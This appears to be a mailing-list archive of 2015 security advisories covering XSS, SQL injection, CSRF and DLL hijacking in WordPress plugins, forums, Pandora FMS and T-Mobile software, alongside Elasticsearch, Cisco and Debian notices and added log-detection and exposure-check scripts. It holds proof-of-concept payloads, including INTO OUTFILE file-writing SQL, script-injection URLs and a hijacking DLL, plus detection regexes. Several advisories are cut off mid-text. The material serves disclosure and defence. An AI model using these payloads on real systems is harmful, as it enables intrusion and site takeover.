Two Reflected XSS Vulnerabilities in Easing Slider WordPress Plugin

2015-02-11 Thread High-Tech Bridge Security Research
Advisory ID: HTB23249
Product: Easing Slider WordPress Plugin
Vendor: Easing Slider
Vulnerable Version(s): 2.2.0.6 and probably prior
Tested Version: 2.2.0.6
Advisory Publication: January 21, 2015 [without technical details]
Vendor Notification: January 21, 2015 
Vendor Patch: January 22, 2015 
Public Disclosure: February 11, 2015 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2015-1436
Risk Level: Low 
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered two XSS vulnerabilities in 
Easing Slider WordPress plugin, which can be exploited against administrators 
of WordPress (with the vulnerable plugin) to perform Cross-Site Scripting 
attacks.

Successful exploitation of the vulnerabilities may allow an attacker to steal 
administrator’s cookies and gain complete control over the website.

1) Two Reflected XSS Vulnerabilities in Easing Slider WordPress Plugin: 
CVE-2015-1436

1.1 The vulnerability exists due to insufficient sanitization of input data 
passed via the "edit" HTTP GET parameter to the "/wp-admin/admin.php" script 
when "page" is set to "easingslider_manage_customizations". A remote attacker 
can trick a logged-in administrator into opening a specially crafted link and 
execute arbitrary HTML and script code in the browser in the context of the 
vulnerable website. 

The PoC code below uses the JS "alert()" function to display an "ImmuniWeb" popup:

http://[host]/wp-admin/admin.php?page=easingslider_manage_customizations&edit=%22%3E%3Cscript%3Ealert%28/ImmuniWeb/%29;%3C/script%3E

1.2 The vulnerability exists due to insufficient sanitization of input data 
passed via the "edit" HTTP GET parameter to the "/wp-admin/admin.php" script 
when "page" is set to "easingslider_edit_sliders". A remote attacker can trick 
a logged-in administrator into opening a specially crafted link and execute 
arbitrary HTML and script code in the browser in the context of the vulnerable 
website. 

The PoC code below uses the JS "alert()" function to display an "ImmuniWeb" popup:

http://[host]/wp-admin/admin.php?page=easingslider_edit_sliders&edit=%27%22%3E%3Cscript%3Ealert%28/ImmuniWeb/%29;%3C/script%3E


---

Solution:

Update to Easing Slider 2.2.0.7

More Information:
https://wordpress.org/plugins/easing-slider/changelog/

---

References:

[1] High-Tech Bridge Advisory HTB23249 - 
https://www.htbridge.com/advisory/HTB23249 - Two Reflected XSS Vulnerabilities 
in Easing Slider WordPress Plugin.
[2] Easing Slider WordPress plugin - http://easingslider.com - Easing Slider is 
an extremely easy to use slider plugin for WordPress.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



Multiple Vulnerabilities in my little forum

2015-02-11 Thread High-Tech Bridge Security Research
Advisory ID: HTB23248
Product: my little forum
Vendor: http://mylittleforum.net/
Vulnerable Version(s): 2.3.3 and probably prior
Tested Version: 2.3.3
Advisory Publication: January 14, 2015 [without technical details]
Vendor Notification: January 14, 2015 
Vendor Patch: February 8, 2015 
Public Disclosure: February 11, 2015 
Vulnerability Type: SQL Injection [CWE-89], Cross-Site Scripting [CWE-79]
CVE References: CVE-2015-1434, CVE-2015-1435
Risk Level: Medium 
CVSSv2 Base Scores: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in 
my little forum, which can be exploited to perform SQL Injection and Cross-Site 
Scripting (XSS) attacks. The SQL injection vulnerabilities are assigned medium 
risk as they can be exploited under an administrator account or via an XSRF 
vector. 


1) SQL Injection in my little forum: CVE-2015-1434

1.1 Input passed via the "edit_category" HTTP GET parameter to the "/index.php" 
script is not properly sanitised before being used in an SQL query. This can be 
exploited to manipulate SQL queries by injecting arbitrary SQL code.

The simple PoC code below will create a file in the web root with the phpinfo() 
function (if MySQL has enough privileges, and the current web user can write 
into the directory):

http://[host]/index.php?mode=admin&edit_category=' UNION SELECT 1,2,3,'' INTO OUTFILE '/var/www/file.php' -- 

1.2 Input passed via the "letter" HTTP GET parameter to the "/index.php" script 
is not properly sanitised before being used in an SQL query. This can be 
exploited to manipulate SQL queries by injecting arbitrary SQL code.

The simple PoC code below will create a file in the web root with the phpinfo() 
function (if MySQL has enough privileges, and the current web user can write 
into the directory):

http://[host]/index.php?mode=admin&action=user&letter=' UNION SELECT '' INTO OUTFILE '/var/www/file.php' -- 

Both vulnerabilities require administrative privileges; however, they can also 
be exploited via an XSRF vector, to which the application is also vulnerable.


2) Cross-Site Scripting (XSS) in my little forum: CVE-2015-1435

2.1 Input passed via the "back" GET parameter to "/index.php" is not properly 
sanitised before being returned to the user. A remote attacker can trick a 
logged-in user into opening a specially crafted link and execute arbitrary HTML 
and script code in the browser in the context of the vulnerable website.

The PoC below uses the JS "alert()" function to display a pop-up with "ImmuniWeb":

http://[host]/index.php?delete_posting=1&mode=posting&back=%22%3E%3Cscript%3Ealert%28/ImmuniWeb/%29;%3C/script%3E


---

Solution:

Update to my little forum 2.3.4

More Information:
http://mylittleforum.net/forum/index.php?id=8182

---

References:

[1] High-Tech Bridge Advisory HTB23248 - 
https://www.htbridge.com/advisory/HTB23248 - Multiple Vulnerabilities in my 
little forum.
[2] my little forum - http://mylittleforum.net/ - my little forum is a simple 
PHP and MySQL based internet forum that displays the messages in classical 
threaded view (tree structure).
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.
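Detection logic for the two High-Tech Bridge advisories above (HTB23249, the Easing Slider "edit" parameter, and HTB23248, the my little forum "edit_category", "letter" and "back" parameters), run over web-server access-log lines. This is an added example, not code from the advisories or from either vendor; the log lines, client IPs, the combined log layout and the script path suffixes are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# One Apache/nginx "combined"-format line: client IP, timestamp and request
# line are all this detector needs (assumption: standard combined layout).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) \S+" (?P<status>\d{3})'
)

# Payload markers, applied to the decoded parameter value.
XSS_MARKERS = re.compile(
    r'<\s*/?\s*(script|iframe|img|svg|body)\b|\bon\w+\s*=|javascript:', re.I)
SQLI_MARKERS = re.compile(
    r"""['"]\s*(union|or|and|select)\b|\bunion\s+(all\s+)?select\b"""
    r"""|\binto\s+(out|dump)file\b|--\s*$|/\*""", re.I)

# Sinks named in the advisories:
# (script path suffix, other parameters that must be present, parameter, kind)
SINKS = [
    ("/wp-admin/admin.php",
     {"page": {"easingslider_manage_customizations", "easingslider_edit_sliders"}},
     "edit", "xss"),                                               # HTB23249 1.1/1.2
    ("/index.php", {"mode": {"admin"}}, "edit_category", "sqli"),  # HTB23248 1.1
    ("/index.php", {"mode": {"admin"}}, "letter", "sqli"),         # HTB23248 1.2
    ("/index.php", {}, "back", "xss"),                             # HTB23248 2.1
]


def scan_request(uri):
    """Return [(parameter, kind), ...] for every sink a single request URI hits."""
    parts = urlsplit(uri)
    qs = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    for path, required, param, kind in SINKS:
        if not parts.path.endswith(path) or param not in qs:
            continue
        if any(qs.get(k, [""])[0] not in allowed for k, allowed in required.items()):
            continue
        marker = XSS_MARKERS if kind == "xss" else SQLI_MARKERS
        # parse_qs already decoded once; decode again so a double-encoded
        # payload (%2527 -> %27 -> ') does not slip past the markers.
        if any(marker.search(unquote_plus(v)) for v in qs[param]):
            findings.append((param, kind))
    return findings


def scan_log(lines):
    """Run scan_request over access-log lines; one alert dict per hit, in log order."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        for param, kind in scan_request(m["uri"]):
            alerts.append({"ip": m["ip"], "time": m["ts"], "status": m["status"],
                           "path": urlsplit(m["uri"]).path,
                           "param": param, "kind": kind})
    return alerts


# Constructed sample log: lines 1-3 replay the advisories' PoC requests as a
# browser would URL-encode them; lines 4-5 are ordinary admin traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [11/Feb/2015:10:00:01 +0000] "GET /wp-admin/admin.php?page=easingslider_manage_customizations&edit=%22%3E%3Cscript%3Ealert%28/ImmuniWeb/%29;%3C/script%3E HTTP/1.1" 200 5120',
    '203.0.113.7 - - [11/Feb/2015:10:00:02 +0000] "GET /index.php?mode=admin&edit_category=%27%20UNION%20SELECT%201,2,3,%27%27%20INTO%20OUTFILE%20%27/var/www/file.php%27%20--%20 HTTP/1.1" 200 812',
    '198.51.100.4 - - [11/Feb/2015:10:00:03 +0000] "GET /index.php?delete_posting=1&mode=posting&back=%22%3E%3Cscript%3Ealert%28/ImmuniWeb/%29;%3C/script%3E HTTP/1.1" 302 0',
    '198.51.100.4 - - [11/Feb/2015:10:00:04 +0000] "GET /wp-admin/admin.php?page=easingslider_edit_sliders&edit=3 HTTP/1.1" 200 4410',
    '198.51.100.4 - - [11/Feb/2015:10:00:05 +0000] "GET /index.php?mode=admin&action=user&letter=B HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f"{a['time']} {a['ip']} {a['kind'].upper():4} {a['path']} "
              f"param={a['param']} status={a['status']}")
```

A 200 status on a flagged reflected-XSS request means the payload was served to an admin session, so the alert is worth correlating with that user's later activity; for the SQLi sinks a 200 says nothing about whether INTO OUTFILE succeeded, so check the web root as well.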



Facebook Bug Bounty #23 - Session ID & CSRF Vulnerability

2015-02-11 Thread Vulnerability Lab
Document Title:
===
Facebook Bug Bounty #23 - Session ID & CSRF Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1432

Facebook Security ID: 10202805822321483

Video: https://www.youtube.com/watch?v=SAr2AGLrBkQ

Vulnerability Magazine: 
http://magazine.vulnerability-db.com/?q=articles/2015/02/03/facebook-security-12500-bug-bounty-reward-security-researcher


Release Date:
=
2015-02-03


Vulnerability Laboratory ID (VL-ID):

1432


Common Vulnerability Scoring System:

9.1


Product & Service Introduction:
===
Facebook is an online social networking service, whose name stems from the 
colloquial name for the book given to students 
at the start of the academic year by some university administrations in the 
United States to help students get to know 
each other. It was founded in February 2004 by Mark Zuckerberg with his college 
roommates and fellow Harvard University 
students Eduardo Saverin, Andrew McCollum, Dustin Moskovitz and Chris Hughes. 
The website`s membership was initially limited 
by the founders to Harvard students, but was expanded to other colleges in the 
Boston area, the Ivy League, and Stanford University. 
It gradually added support for students at various other universities before 
opening to high school students, and eventually to anyone 
aged 13 and over. Facebook now allows any users who declare themselves to be at 
least 13 years old to become registered users of the site.

Users must register before using the site, after which they may create a 
personal profile, add other users as friends, and exchange messages, 
including automatic notifications when they update their profile. Additionally, 
users may join common-interest user groups, organized by workplace, 
school or college, or other characteristics, and categorize their friends into 
lists such as `People From Work` or `Close Friends`. As of 
September 2012, Facebook has over one billion active users, of which 8.7% are 
fake. According to a May 2011 Consumer Reports survey, there are 
7.5 million children under 13 with accounts and 5 million under 10, violating 
the site`s terms of service.

In May 2005, Accel partners invested $12.7 million in Facebook, and Jim Breyer 
added $1 million of his own money to the pot. A January 2009 
Compete.com study ranked Facebook as the most used social networking service by 
worldwide monthly active users. Entertainment Weekly included the 
site on its end-of-the-decade `best-of` list, saying, `How on earth did we 
stalk our exes, remember our co-workers` birthdays, bug our friends, 
and play a rousing game of Scrabulous before Facebook?` Facebook eventually 
filed for an initial public offering on February 1, 2012, and was 
headquartered in Menlo Park, California. Facebook Inc. began selling stock to 
the public and trading on the NASDAQ on May 18, 2012. Based on its 
2012 income of USD 5.1 Billion, Facebook joined the Fortune 500 list for the 
first time, being placed at position of 462 on the list published in 2013.

(Copy of the Homepage: http://en.wikipedia.org/wiki/Facebook )


Abstract Advisory Information:
==
An independent Vulnerability Laboratory researcher discovered a session 
manipulation vulnerability and csrf bug in the official Facebook online service 
web-application.


Vulnerability Disclosure Timeline:
==
2015-02-03: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Facebook
Product: Framework - Content Management System 2015 Q1


Exploitation Technique:
===
Remote


Severity Level:
===
Critical


Technical Details & Description:

A remote session validation vulnerability and cross site request forgery bug 
has been discovered in the official Facebook online service web-application.
The vulnerability allows attackers to execute functions without secure 
validation to compromise user content in the online service web-application 
of Facebook.

The vulnerability is located in the comment id and legacy id of the comments 
function. Remote attackers with low privileged user accounts are able to delete 
postings of other users without auth. The attacker can intercept the session 
and exchange the comment and legacy id to delete or add, for example, comments.
The issue is rated critical and poses a high risk to other user accounts. To 
manipulate, the attacker needs to intercept the session to manipulate the 
legacy and comment ids.

The security risk of the session validation vulnerability and csrf issue is 
estimated as critical with a cvss (common vulnerability scoring system) count 
of 9.1. 
Exploitation of the vulnerability requires a low privileged application user 
account and no user int

BlinkSale Bug Bounty #1 - Encode & Validation Vulnerability

2015-02-11 Thread Vulnerability Lab
Document Title:
===
BlinkSale Bug Bounty #1 - Encode & Validation Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1416


Release Date:
=
2015-02-06


Vulnerability Laboratory ID (VL-ID):

1416


Common Vulnerability Scoring System:

3.6


Product & Service Introduction:
===
We like to get paid. We’re sure you feel the same. So while you can use 
Blinksale and get paid by check, our integration 
with Stripe* makes it easy to get paid in a flash. Just sign up at Stripe, put 
your credentials into Blinksale, and you’re 
all set to accept credit card payments on your invoices!

(Copy of the Vendor Homepage: https://www.blinksale.com/ )


Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team discovered an application-side input 
validation mail encoding web vulnerability in the official BlinkSale 
web-application.


Vulnerability Disclosure Timeline:
==
2015-01-19: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2015-01-20: Vendor Notification (BlinksaleSecurity Team)
2015-01-26: Vendor Response/Feedback (BlinksaleSecurity Team)
2015-02-03: Vendor Fix/Patch  (Blinksale Developer Team)
2015-02-06: Public Disclosure  (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Doublewide Partners
Product: Blinksale 2015 Q1


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Technical Details & Description:

A persistent input validation mail encoding vulnerability has been discovered 
in the official BlinkSale company web-application.
The issue allows remote attackers to inject their own malicious web context 
into the application-side of a vulnerable module or function.

The security vulnerability is located in the `firstname` and `lastname` input 
field values of the `signups` file. Remote attackers and local privileged 
application user accounts can exploit the issue to execute persistent malicious 
context in blinksale service mails. The injection takes place in the signup 
POST method request with the vulnerable input values. The execution of the 
script code occurs on the application-side in the email after the introduction 
word `Hello` [X Username]. Attackers are able to inject iframes, img sources 
with onload alert or other script code tags. The service does not encode the 
input and also has no input restriction. After the code has been saved during 
the registration, the internal service takes the wrongly encoded dbms entries 
and streams them back in a notification mail to the user's inbox.

The security risk of the persistent input validation web vulnerability in the 
mail encoding of the web-server is estimated as medium with a cvss 
(common vulnerability scoring system) count of 3.6. If the issue exists in 
the main service values, the other services can be affected by the issue too. 
Exploitation of the mail encoding and web-server validation vulnerability 
requires low or medium user interaction and no privileged customer application 
user account. Successful exploitation of the persistent mail encoding web 
vulnerability results in session hijacking, persistent phishing attacks, 
persistent redirects to external malicious sources and persistent manipulation 
of affected or connected module context.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] signups

Vulnerable Parameter(s):
[+] firstname
[+] lastname

Affected Module(s):
[+] Welcome to Blinksale!


Proof of Concept (PoC):
===
The application-side mail encoding web vulnerability can be exploited by remote 
attackers with a low privileged application user account and low user 
interaction.
For security demonstration or to reproduce the security vulnerability, follow 
the provided information and steps below to continue.

1. Open the signup website of the blinksale portal 
(https://application.blinksale.com/signups)
2. Include random values to the email, password and inject a script code 
payload as firstname and lastname to the input fields. Save!
3. Go to the mail inbox and wait for the automatic reply with the persistent 
injected script code
4. Successful reproduction of the remote mail encoding vulnerability
Note: The issue can stream persistent malicious context in mails to existing 
users, new users or random emails to phish or spam!


PoC: Welcome to Blinksale!


  

  
Hello "><[APPLICATION-SIDE SCRIPT 
CODE EXECUTION VULNERABILITY!]iframe src="a" onload='alert("PENTEST")'>
Welcome to Blinksale, the easiest 

Pandora FMS v5.1 SP1 - SQL Injection Web Vulnerability

2015-02-11 Thread Vulnerability Lab
Document Title:
===
Pandora FMS v5.1 SP1 - SQL Injection Web Vulnerability


References (Source):

http://vulnerability-lab.com/get_content.php?id=1355


Release Date:
=
2015-02-09


Vulnerability Laboratory ID (VL-ID):

1355


Common Vulnerability Scoring System:

6.3


Product & Service Introduction:
===
Pandora FMS is a monitoring Open Source software. It watches your systems and 
applications, and allows you to 
know the status of any element of those systems. Pandora FMS could detect a 
network interface down, a defacement 
in your website, a memory leak in one of your server application, or the 
movement of any value of the NASDAQ 
new technology market. 

* Detect new systems in network.
* Checks for availability or performance.
* Raise alerts when something goes wrong.
* Allow to get data inside systems with its own lite agents (for almost 
every Operating System).
* Allow to get data from outside, using only network probes. Including SNMP.


* Get SNMP Traps from generic network devices. 
* Generate real time reports and graphics.
* SLA reporting.
* User defined graphical views.
* Store data for months, ready to be used on reporting.
* Real time graphs for every module. 
* High availability for each component.
* Scalable and modular architecture.
* Supports up to 2500 modules per server.
* User defined alerts. Also could be used to react on incidents.
* Integrated incident manager.
* Integrated DB management: purge and DB compaction. 
* Multiuser, multi profile, multi group.
* Event system with user validation for operation in teams.
* Granularity of accesses and user profiles for each group and each user.
* Profiles could be personalized using up to eight security attributes 
without limitation on groups or profiles. 

Pandora FMS runs on any operating system, with specific agents for each 
platform, gathering data and sending it to a 
server, it has specific agents for GNU/Linux, AIX, Solaris, HP-UX, BSD/IPSO, 
and Windows 2000, XP and 2003.

(Copy of the Vendor Homepage: 
http://pandorafms.org/index.php?sec=project&sec2=home&lang=en)


Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team discovered a SQL Injection web 
vulnerability in the official Pandora FMS monitoring web-application.


Vulnerability Disclosure Timeline:
==
2015-02-09: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Artica Soluciones Tecnologicas
Product: Pandora FMS - Monitoring Web Application 5.1 SP1


Exploitation Technique:
===
Remote


Severity Level:
===
High


Technical Details & Description:

A remote sql injection web vulnerability has been discovered in the official 
Pandora FMS v5.1 SP1 monitoring web-application.
The vulnerability allows remote attackers and low privileged application user 
accounts to execute unauthorized sql commands that compromise the affected 
monitoring web-application and dbms.

The vulnerability is located in the offset value of the index list context 
module. Remote attackers and low privileged application user accounts are able 
to execute their own sql commands via a GET method request. The attacker can 
prepare a request through the `agentes` module to inject their own sql commands 
into the affected web-application dbms.

The security risk of the sql injection vulnerability is estimated as critical 
with a cvss (common vulnerability scoring system) count of 6.3.
Exploitation of the remote sql injection web vulnerability requires no user 
interaction and a low privileged web-application user account.
Successful exploitation of the remote sql injection results in dbms, web-server 
and web-application compromise.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] agentes
[+] agents_modules

Vulnerable Parameter(s):
[+] offset


Proof of Concept (PoC):
===
The sql injection web vulnerabilities can be exploited by local low privileged 
application user accounts in godmode without user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.

PoC:
http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/estado_agente&refr=60&group_id=0&search=&sort_field=&sort=none&status=0&offset=-1%27-[SQL
 INJECTION VULNERABILITY!]'--
http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&tab=gis&id_agente=349&refr=&period=2592000&refresh=Refresh%20path&offset=-1%27-[SQL
 INJEC

T-Mobile Internet Manager - DLL Hijacking (mfc71enu.dll)

2015-02-11 Thread Vulnerability Lab
Document Title:
===
T-Mobile Internet Manager - DLL Hijacking (mfc71enu.dll)


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1427


Release Date:
=
2015-01-29


Vulnerability Laboratory ID (VL-ID):

1427


Common Vulnerability Scoring System:

5.6


Product & Service Introduction:
===
For a long time the very popular HSPA+ USB stick Huawei E1823, alias Web`n`Walk 
Stick Business, was only available to business customers, at least if you 
wanted to order it directly from Telekom. With today's announcement that the 
UMTS network has now been upgraded to 21.6 Mbit/s, a way for private customers 
to buy it naturally had to follow. The stick, which reaches up to 28.8 Mbit/s, 
is now available directly from Telekom for 69.95 € without a contract or for 
4.95 € with a data contract. The stick has no SIM lock, so it can be used with 
any card and on any network. On the stick's product page Telekom also 
advertises the possibility of worldwide use, which the many supported radio 
frequencies make possible.

(Copy of the Vendor Homepage: http://maxwireless.de/2011/webnwalk-stick-business-huawei-e1823-ab-sofort-bestellbar/ )


Abstract Advisory Information:
==
An independent vulnerability laboratory researcher discovered a dll hijacking 
vulnerability in the T-Mobile Web’n’Walk Stick Business (Huawei E1823) Internet 
Manager v11.301.05.65.55 software.


Vulnerability Disclosure Timeline:
==
2015-01-29: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

T-Mobile
Product: Web`n`Walk Stick Business E1823 (USB) - Software 11.301.05.65.55


Exploitation Technique:
===
Local


Severity Level:
===
Medium


Technical Details & Description:

T-Mobile's Web`n`Walk Stick software could allow a remote attacker to execute 
arbitrary code on the system. The software does not specify the fully qualified 
path to a dynamic-linked library (mfc71enu.dll). The Windows software is 
vulnerable to dll hijacking attacks. The vulnerable version affects Microsoft 
Windows (wininstaller_11.301.05.65.55.zip).

HUAWEI Mobile Broadband
HSPA+ USB Sidebar
Model HUAWEI E1823 


Proof of Concept (PoC):
===
The dll hijacking vulnerability can be exploited by local attackers with low 
privileged system user account and without user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Compile dll and rename to mfc71enu.dll or mfc71loc.dll
2. Copy mfc71enu.dll to C:\Program Files\T-Mobile\InternetManager_H
3. Launch T-Mobile Internet Manager
4. Successful reproduction of the local dll hijacking vulnerability!


PoC: Exploit

#include <windows.h>
#include <stdlib.h>

/* Payload executed when the planted DLL is loaded: starts calc as a visible
   proof of execution, then terminates the host process. */
int alpdaemon()
{
  WinExec("calc", SW_SHOW);
  exit(0);
  return 0;
}

/* DLL entry point; the loader calls it as soon as the library is mapped. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
  alpdaemon();
  return 0;
}


PoC: Video
http://youtu.be/Go0iHJON7u4

Reference(s):
http://maxwireless.de/2011/webnwalk-stick-business-huawei-e1823-ab-sofort-bestellbar/
https://www.t-mobile.de/downloads/neu/wininstaller_11.301.05.65.55.zip


Security Risk:
==
The security risk of the local dll hijacking vulnerability in the mfc71enu.dll 
is estimated as medium. (CVSS 5.6)


Credits & Authors:
==
metacom


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential 
loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. 
We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen 
material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: ad...@vulnerability-lab.com - resea...@vulnerability-lab.com - ad...@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!

[ANN] MSKB 3004375 available for Windows 2000 and later too (but NOT from Microsoft)

2015-02-11 Thread Stefan Kanthak
Hi @ll,

yesterday Microsoft published the security advisory 3004375

announcing an update which enables Windows 7 and newer to log
the command lines used to start processes to the event log.

If you want to have this functionality on older versions of
Windows too see 
(but notice the license terms).

Limitation: command lines of processes that don't load USER32.DLL
are not logged. Fortunately, almost all Win32 applications do
load USER32.DLL.

JFTR: APPINIT.DLL has worked for 20 years.

regards
Stefan Kanthak


Cisco Security Advisory: Cisco Secure Access Control System SQL Injection Vulnerability

2015-02-11 Thread Cisco Systems Product Security Incident Response Team

Cisco Secure Access Control System SQL Injection Vulnerability

Advisory ID: cisco-sa-20150211-csacs

http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150211-csacs

Revision 1.0

For Public Release 2015 February 11 16:00  UTC (GMT)

+-

Summary
===

Cisco Secure Access Control System (ACS) prior to version 5.5 patch 7 is 
vulnerable to a SQL injection attack in the ACS View reporting interface pages. 
A successful attack could allow an authenticated, remote attacker to access and 
modify information such as RADIUS accounting records stored in one of the ACS 
View databases or to access information in the underlying file system.

Cisco has released free software updates that address this vulnerability.

This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150211-csacs



Elasticsearch vulnerability CVE-2015-1427

2015-02-11 Thread Kevin Kluge
Summary:
Elasticsearch versions 1.3.0-1.3.7 and 1.4.0-1.4.2 have vulnerabilities in the 
Groovy scripting engine.  The vulnerabilities allow an attacker to construct 
Groovy scripts that escape the sandbox and execute shell commands as the user 
running the Elasticsearch Java VM.  

We have been assigned CVE-2015-1427 for this.


Fixed versions:
Versions 1.3.8 and 1.4.3 disable sandboxing for Groovy by default.  As a 
consequence, dynamic script execution is disabled for Groovy.


Remediation:
Users should upgrade to 1.3.8 or 1.4.3.  Users that do not want to upgrade can 
address the vulnerabilities by setting script.groovy.sandbox.enabled to false 
in elasticseach.yml and restarting the node.

Also, we have published a procedure for moving trusted Groovy dynamic scripts 
to disk so that users can continue their use, even with Groovy dynamic 
scripting disabled.  This will require a small client change from the user.


Credit:
We received two reports of similar issues, one from the Cisco Systems 
Information Security Team and one from Cameron Morris.


CVSS:
Overall CVSS score: 5.8
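An added exposure check for CVE-2015-1427 that applies the two conditions the advisory above states: the node version lies in 1.3.0-1.3.7 or 1.4.0-1.4.2, and script.groovy.sandbox.enabled has not been set to false in elasticsearch.yml. It is not Elastic's code; the two elasticsearch.yml fragments are constructed, and the check assumes plain x.y.z version strings and the flat dotted-key YAML form.

```python
# Affected ranges from the advisory, inclusive: 1.3.0-1.3.7 and 1.4.0-1.4.2.
AFFECTED_RANGES = (((1, 3, 0), (1, 3, 7)), ((1, 4, 0), (1, 4, 2)))
SANDBOX_KEY = "script.groovy.sandbox.enabled"


def parse_version(text):
    """'1.4.2' -> (1, 4, 2). Assumption: plain x.y.z release strings; a suffix
    such as '-SNAPSHOT' is dropped rather than compared."""
    core = text.strip().split("-", 1)[0]
    return tuple(int(p) for p in core.split("."))


def version_affected(version):
    """True when the version falls inside one of the advisory's affected ranges."""
    v = parse_version(version)
    return any(lo <= v <= hi for lo, hi in AFFECTED_RANGES)


def groovy_sandbox_enabled(yml_text):
    """True unless elasticsearch.yml sets script.groovy.sandbox.enabled to false.
    Only the flat 'dotted.key: value' form is handled (assumption); comments and
    quotes are stripped. Key absent -> True, the default in the affected versions."""
    for raw in yml_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        key, sep, val = line.partition(":")
        if sep and key.strip() == SANDBOX_KEY:
            return val.strip().strip("'\"").lower() not in ("false", "no", "off")
    return True


def assess_node(version, yml_text):
    """(exposed, reason) for one node. Only the two conditions the advisory names
    are modelled; other script.* settings are assumed to be at their defaults."""
    if not version_affected(version):
        return False, f"version {version} is outside the affected ranges"
    if not groovy_sandbox_enabled(yml_text):
        return False, f"{SANDBOX_KEY} is false (mitigation from the advisory)"
    return True, (f"version {version} is affected and the Groovy sandbox is still "
                  f"enabled: dynamic Groovy scripts can escape it")


# Constructed elasticsearch.yml fragments: the weak default and the mitigated form.
WEAK_YML = """cluster.name: prod-search
node.name: es-node-1
# script.groovy.sandbox.enabled left at its default (true)
"""
MITIGATED_YML = """cluster.name: prod-search
node.name: es-node-1
script.groovy.sandbox.enabled: false   # mitigation from the advisory
"""

if __name__ == "__main__":
    for ver, yml in (("1.4.2", WEAK_YML), ("1.4.2", MITIGATED_YML), ("1.4.3", WEAK_YML)):
        exposed, why = assess_node(ver, yml)
        print(f"{ver}: {'EXPOSED' if exposed else 'ok'} - {why}")
```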




[SECURITY] [DSA 3160-1] xorg-server security update

2015-02-11 Thread Moritz Muehlenhoff

------------------------------------------------------------------------
Debian Security Advisory DSA-3160-1                   secur...@debian.org
http://www.debian.org/security/                        Moritz Muehlenhoff
February 11, 2015                      http://www.debian.org/security/faq
------------------------------------------------------------------------

Package: xorg-server
CVE ID : CVE-2015-0255

